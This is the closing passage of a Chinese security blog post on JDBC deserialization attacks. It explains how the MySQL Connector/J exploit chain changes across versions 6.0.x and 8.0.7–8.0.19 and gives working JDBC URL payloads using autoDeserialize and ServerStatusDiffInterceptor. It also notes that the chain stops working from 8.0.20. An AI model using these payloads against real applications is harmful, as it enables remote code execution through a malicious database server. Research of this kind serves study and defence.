<h3 id="6-0-0-6-0-6-1"><a href="#6-0-0-6-0-6-1" class="headerlink" title="6.0.0-6.0.6"></a>6.0.0-6.0.6</h3><p>6.x此利用链与上述5.1.11-5.1.48完全相同，仅更改了包名，由com.mysql.jdbc改为com.mysql.cj.jdbc。</p>
<h4 id="payload-6"><a href="#payload-6" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=d5fadd4<br></code></pre></td></tr></table></figure>

<h3 id="8-0-7-8-0-19"><a href="#8-0-7-8-0-19" class="headerlink" title="8.0.7-8.0.19"></a>8.0.7-8.0.19</h3><p>这里就是在原来的基础上，把参数名改了，<code>com.mysql.cj.jdbc.ConnectionImpl#initializeSafeQueryInterceptors()</code>：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768379098222-f11a82c6-2376-49ce-9a1e-37be2ad5b8d7.png" srcset="/img/loading.gif" lazyload></p>
<p>这个常量就是<code>queryInterceptors</code>。</p>
<h4 id="payload-7"><a href="#payload-7" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=d5fadd4<br></code></pre></td></tr></table></figure>

<h3 id="8-0-20之后"><a href="#8-0-20之后" class="headerlink" title="8.0.20之后"></a>8.0.20之后</h3><p><code>com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor#populateMapWithSessionStatusValues()</code>不再调用<code>getObject()</code>，此利用链失效。</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768379333688-a06b0ff9-47dd-4718-9f12-890fafac688e.png" srcset="/img/loading.gif" lazyload></p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://tttang.com/archive/1877/">https://tttang.com/archive/1877/</a></p>
<p><a target="_blank" rel="noopener" href="https://forum.butian.net/share/2872">https://forum.butian.net/share/2872</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/JAVA/" class="category-chain-item">JAVA</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/JAVA/" class="print-no-link">#JAVA</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>JDBC反序列化</div>
      <div>http://example.com/2026/01/14/JDBC反序列化/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Infernity</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年1月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/02/%E5%88%A9%E7%94%A8WindowsAccessToken%E6%8F%90%E6%9D%83/" title="利用Windows Access Token提权">
                        <span class="hidden-mobile">利用Windows Access Token提权</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>





  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
